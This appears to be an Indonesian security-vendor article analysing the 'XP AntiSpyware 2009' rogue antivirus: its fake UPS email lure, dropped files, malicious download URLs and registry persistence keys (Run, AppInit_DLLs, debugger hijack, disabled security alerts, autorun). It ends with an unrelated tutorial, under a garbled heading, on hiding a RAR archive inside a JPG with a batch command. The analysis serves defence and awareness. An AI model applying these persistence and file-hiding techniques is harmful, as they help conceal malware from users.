Jika anda menanyakan, virus apa yang merajai dunia dan Indonesia pada paruh tahun ke dua 2008. Jangan terkejut jika jawabannya adalah kuda hitam Antivirus Gadungan yang banyak disebut dengan istilah Rogue Scanner, Advance Antivirus atau Scamware. Jika anda bingung apa yang Vaksincom bicarakan, bahasa yang lebih membumi dan membuat pengguna komputer sadar adalah Antivirus XP 2008, Antivirus XP 2009, IE Defender, Internet Antivirus, SpyHeal, SpySheriff yang kalau diteruskan daftarnya akan cukup membuat pegal baik mengetik maupun membacanya. (lihat contoh Antivirus XP di gambar 1).

Jumlah Antivirus Gadungan saat ini yang terdeteksi adalah 304 antivirus gadungan. Data yang dikumpulkan statistik virus Vaksincom didukung data statistik Norman Network Protector (NNP) yang di instal di beberapa ISP mengkonfirmasikan hal ini. Dapat dipastikan ribuan komputer di Indonesia yang terkoneksi ke internet terinfeksi virus ini dan celakanya virus ini memiliki genetik Spyware dan memiliki kemampuan mengupdate dirinya sendiri, sehingga untuk membersihkannya membutuhkan perjuangan berat dan beberapa user yang kesal memilih jurus Pasopati (format :P).

Antivirus Gadungan ini memiliki banyak cara menyebarkan dirinya, menurut pengamatan Vaksincom metode ini selalu diperbaharui setiap kali ditemukan cara efektif mengatasinya. Adapun metode yang umum digunakan adalah sebagai berikut :

*

Mengeksploitasi celah keamanan (Java Script) browser waktu mengunjungi website tertentu sehingga akan terinstal secara otomatis dan menampilkan peringatan palsu.

*

Menawarkan scan malware gratis atau tune up sistem komputer gratis.
*

Email, dalam hal eksploitasi email pembuat virus ini cukup kreatif. Adapun bentuk-bentuk email yang terdeteksi adalah sebagai berikut :
o

Kartu ucapan / greeting card. Email yang datang juga memiliki banyak varian, baik yang datang dalam lampiran bervirus (biasanya di kompres / zip) maupun hanya link download yang memanfaatkan fitur “drive by download”.
o

Breaking News dari CNN atau situs berita yang lain.
o

Menawarkan film porno artis ternama seperti Angelina Jolie yang dikombinasikan dengan baik sekali dengan rekayasa sosial pada situs You Tube. Dimana file yang mengandung virus seakan-akan harus di download sebagai codec (file yang diperlukan untuk menonton file film di You Tube). Lihat artikel http://vaksin.com/2008/0808/anjelina-jolie2/anjelina-jolie2.html
o

Datang dalam lampiran terkompres seperti yang terakhir ditemui Vaksincom datang sebagai email konfirmasi pengiriman barang dari UPS yang meminta kita mencetak invoice .doc yang sebenarnya adalah file virus karena memiliki ekstensi ganda (ups_letter.doc.exe). Supaya lampiran ini tidak diblok di mailserver ia di kompres terlebih dahulu dengan nama “ups_letter.zip”. (lihat gambar 3)

Masih ingatkah anda pada artikel virus "anjelina jolie" atau yang lebih dikenal dengan "AntivirusXP 2008", virus yang umum-nya menyerang para pengguna e-mail yang kemudian alih-alih justru mendownload serta meng-install antivirus palsu. Berikut informasi selengkapnya pada, http://vaksin.com/2008/0708/anjelina-jolie/anjelina-jolie.html, dan http://vaksin.com/2008/0808/anjelina-jolie2/anjelina-jolie2.html .



Bagi anda yang masih “trauma” dengan kasus virus tsb, maka kali ini anda harus bersiap-siap dengan kedatangan varian terbaru virus tsb. Jika sebelumnya menggunakan nama “AntivirusXP 2008”, maka kali ini menggunakan nama “XP AntiSpyware 2009”.


Jika anda menerima e-mail dari UPS (United Parcel Service) yang disertai lampiran UPS_letter.zip (lihat gambar 2)

maka sebaiknya jangan sekali-kali dibuka karena akan menginfeksikan komputer anda dengan Antivirus Gadungan.



E-mail tsb menyertakan attachment file dengan nama “UPS_letter.zip”, yang didalamnya berisi sebuah file virus yang memiliki ekstensi ganda, UPS_letter.doc.exe, dan menggunakan icon word serta berukuran 42 kb. (lihat gambar 3)

Jika anda sudah terlanjur membuka attachment tsb, maka file virus yang terdapat pada attachment file tsb secara otomatis akan tereksekusi dan membuat beberapa file virus pada komputer anda. Berikut beberapa file virus yang akan dibuat oleh virus :

- C:\WINDOWS\system32\braviax.exe (10 kb)

- C:\WINDOWS\brastk.exe (10 kb)

- C:\WINDOWS\system32\brastk.exe (10 kb)

- C:\WINDOWS\karna.dat (6 kb)

- C:\WINDOWS\system32\karna.dat (6 kb)

- C:\WINDOWS\system32\delself.bat (1 kb)

- C:\WINDOWS\Tasks\SA.dat (1 kb)

- C:\Program Files\Microsoft Common\wuauclt.exe (42 kb)

- C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\content.ie5\4jkxkjch\kashi[1].exe (43 kb)

- C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\content.ie5\4jkxkjch\kashi[1].exe (43 kb)



Kemudian setelah membuat beberapa file virus dan aktif pada proses windows, virus akan mulai beraksi dengan memberikan sebuah pesan palsu (menyerupai program windows), yang seolah-olah memberitahu anda bahwa di komputer kita terdapat spyware/virus. (lihat gambar 4)

Dengan pesan tsb, virus ini akan “memaksa” anda untuk mengklik link yang dituju. Jika anda sudah mengklik pesan tsb, maka virus akan mendownload secara otomatis file instalasi antispyware palsu, yang secara otomatis pula akan menginstall dirinya (lokasi file download tsb yaitu http://xpas-2009.com/install/Installer.exe). (lihat gambar 5)

Saat anda melanjutkan proses selanjutnya, antispyware palsu ini akan mendownload beberapa file virus berikut file instalasi antispyware tsb. Beberapa file yang didownload oleh virus tsb, yaitu :

- C:\Program Files\Common Files\ : ibureqag.dll, nysexireh.vbs, ybofomas._sy (nama file acak)

- C:\WINDOWS\ : yvohidol.bin, dyfype._dl (nama file acak)

- C:\ WINDOWS\system32\iceze.dl (nama file acak)

- C:\Documents and Settings\all users\Documents\ : isir.sys, tucyf.sys (nama file acak)

- C:\Documents and Settings\%user%\Application Data\ : iwin.dat, jikym.vbs, ojahu.pif, pejax.exe, ypehij.db (nama file acak)

- C:\Documents and Settings\%user%\Cookies\ : ahicixicyd.reg, ihowed.exe, itaw.bin, lebiwige.db, ytar.vbs (nama file acak)

- C:\Documents and Settings\%user%\Local Settings\Application Data\ : awapufu.lib, iqodud.lib, umyh._sy (nama file acak)

- C:\Documents and Settings\%user%\Local Settings\Temporary Internet Files\ibykotit.vbs (nama file acak)

Selanjutnya virus meng-install program antispyware palsu yaitu “XP AntiSpyware 2009”. Program ini tidak jauh berbeda seperti halnya program antispyware lain, seperti terdapat shortcut pada desktop, terinstall pada C:\Program Files, terdapat shortcut pada Start Menu, icon pada taskbar dan terdaftar pada Add Remove Program (lihat gambar 7). Bedanya adalah program ini bukan antispyware, melainkan spyware :P. Untuk meyakinkan korbannya mendownload lebih banyak spyware lagi, ia akan menjalankan aksinya menampilkan pesan “seram” bahwa komptuer tersebut terinfeksi virus-virus dengan resiko tinggi (lihat gambar 6).

Setelah terinstall dengan mudah, program antispyware palsu akan menjalankan aksi-nya (melakukan scanning palsu dan menampilkan pesan palsu).

Setelah selesai menjalankan aksinya, virus akan memberikan report palsu serta meminta anda untuk melakukan register program antispyware palsu tsb. Jika anda tidak ingin melakukan register, maka program akan menampilkan pesan infeksi virus secara terus menerus, dan virus akan terus menambah atau mendownload file virus. (lihat gambar 8)

Jika anda melakukan register, maka anda akan di bawa ke sebuah website yaitu : http://www.xp-antispyware2009.com/buy.html, dimana anda harus membayar sebesar $49.95 hingga $79.95 secara online dengan menggunakan kartu kredit (lihat gambar 9). Hebatnya website ini berfungsi dan memiliki sistem untuk mendebet Kartu Kredit anda. Kalau anda merasa cukup banyak uang dan memiliki kartu kredit untuk membeli antivirus ini. Maka ibarat kata pepatah, “Sudah Jatuh, Tertimpa Tangga, Di gigit anjing Tetangga, anjingnya Rabies lagi“alias sial banget. Mengapa ?

Karena :

1.

Anda sudah dibodohi dengan peringatan virus palsu (sudah rugi moril).
2.

Anda kehilangan uang (rugi materi)
3.

Anda akan mendapatkan produk yang anda kira antivirus, tetapi ternyata virus / spyware juga. Jadi anda membayar untuk mendapatkan spyware.
4.

Kartu kredit anda akan di charge besar, tidak sesuai dengan nominal yang tertera pada saat transaksi.
5.

Kartu kredit anda akan dijadikan sebagai daftar Fraud. Jadi, jika anda pernah bertransaksi membeli antivirus gadungan ini, Vaksincom menyarankan sebaiknya segera matikan nomor kartu kredit anda dan ganti dengan nomor baru.

Jika dilihat sekilas, ibaratnya mata-mata Korea Utara yang cantik, website tsb mampu menipu user dengan menampilkan beberapa data palsu seperti definisi virus terbaru, penghargaan dari beberapa majalah IT dunia, testimonial dari para pengguna program antispyware palsu serta beberapa keuntungan menggunakan program antispyware palsu tsb, dll.


Selain itu, jika suatu ketika anda gagal browsing ke sebuah website atau website yang anda kunjungi tidak dapat ditemukan, maka virus akan menggantikan halaman yang error (page error), dengan halaman website pengganti (lihat gambar 10)

yang sudah dipersiapkan oleh virus ini (yang tentu-nya juga akan menampilkan pesan untuk melakukan register dan diarahkan ke website palsu virus). Pokoknya benar-benar lengkap dan profesional cara kerja Antivirus Gadungan ini.



Registri Windows

Agar dapat aktif saat komputer dijalankan, virus akan membuat string registry sebagai berikut :

*

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

braviax = C:\WINDOWS\system32\braviax.exe

*

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Windows

AppInit_DLLs = karna.dat

*

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

braviax = C:\WINDOWS\system32\braviax.exe

*

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

brastk = brastk.exe



Selain itu, virus membuat string berikut :

*

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Image File Executions Options\Explorer.exe

Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe



Untuk mengubah default web, virus pun membuat string berikut :

*

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\

Search Bar = http://www.google.com/ie

Search Page = http://www.google.com

Start Page = http://www.google.com

*

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

Default_Search_URL = http://www.google.com/ie

Search Page = http://www.google.com

Start Page = http://www.google.com

*

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search

SearchAssistant = http://www.google.com



Selain itu, virus pun membuat string pada security windows berikut :

*

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

AntiVirusDisableNotify = 1

FirewallDisableNotify = 1

UpdateDisableNotify = 1



Untuk mempermudah penyebaran, virus pun membuat string :

*

HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Explorer\ MountPoints2\{706ab86c-937e-11dd-a04c-000c290bc510}\Shell\AutoRun\Command

(Default) = C:\WINDOWS\system32\RunDLL32.EXEShell32.DLL, ShellExec_RunDLL system.exe

*

HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Explorer\ MountPoints2\{706ab86c-937e-11dd-a04c-000c290bc510}\Shell\Explorer\Command

(Default) = %drive%:\system.exe

*

HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Explorer\ MountPoints2\{706ab86c-937e-11dd-a04c-000c290bc510}\Shell\Open\Command

(Default) = %drive%:\system.exe
Menyebarkan diri melalui Flash Disk

Kelihatannya virus ini juga “belajar” dari pembuat virus Indonesia. Sebagai media penyebaran awal, virus mencoba menggunakan media “Flashdisk” ataupun “Disket”, dengan memanfaatkan system autoplay windows agar dirinya dapat aktif secara otomatis setiap kali user akses ke Flashdisk tersebut (lihat gambar 11). File yang di buat yaitu :

*

autorun.inf
*

system.exe

मेम्बुअत फाइल दी दलम File



Sudah pernah belom anda berpikir dapat menyembunyikan file di dalam file!?Wha.Yoi… Keliatan aneh ya! Tapi ternyata file dapat diselipkan didalam sebuah file lain juga. Contoh misalnya seperti file yang ada di dalam file zip atau rar gitu hehehe. Pengen tahu caranya, ayo kita langsung berangkat cabcus!!alah mau mudik emangnya.oke langsung kita jajal yo :

Step pertama buat sebuah folder namanya terserah anda semua mau judulnya anu,free,ana,sini,itu alah malah jadi ngawur he.oke langsung bae (disini saya memberi contoh nama folder “Dataku”)

Step Kedua masukin sebuah file gambar dan file yang akan disembunyikan ( dalam contoh saya memasukkan gambar bernama “ibu.JPG” dan file bernama “fileku.doc”)
Step Ketiga kemudian klik kanan fileku.doc lalu pilih Add to “fileku.rar”


Sehingga akan muncul file baru bernama fileku.rar

Step Keempat kemudian kita buka Notepad dan Anda ketikkan kode berikut ini :

@echo off

ren fileku.rar fileku.doc.rar

copy /b ibu.jpg + fileku.doc.rar Persembunyian.jpg

Lalu kita save ke dalam satu folder dengan file yang tadi (save ke dalam folder Dataku). Save dengan File name “SembunyikanFile.bat” dan Save as type pilih All Files

Sehingga akan muncul file baru bernama SembunyikanFile.bat


Step Kelima selanjutnya double klik file Sembunyiin File.bat, maka akan muncul file baru bernama Persembunyian.jpg. Taukah Anda bahwa file Persembunyian.jpg inilah yang menjadi tempat persembunyian bagi fileku.doc

Terakhir untuk melihat hasilnya, cobalah klik kanan file Persembunyian.jpg lalu pilih menu Open With->Choose Program. Lalu pilih WinRAR archiver kemudian klik OK. Maka akan muncul fileku.doc didalam WinRAR.
Maka akan muncul hasilnya sebagai berikut :

Lumayan kan buat menyembunyikan data. Coba aja.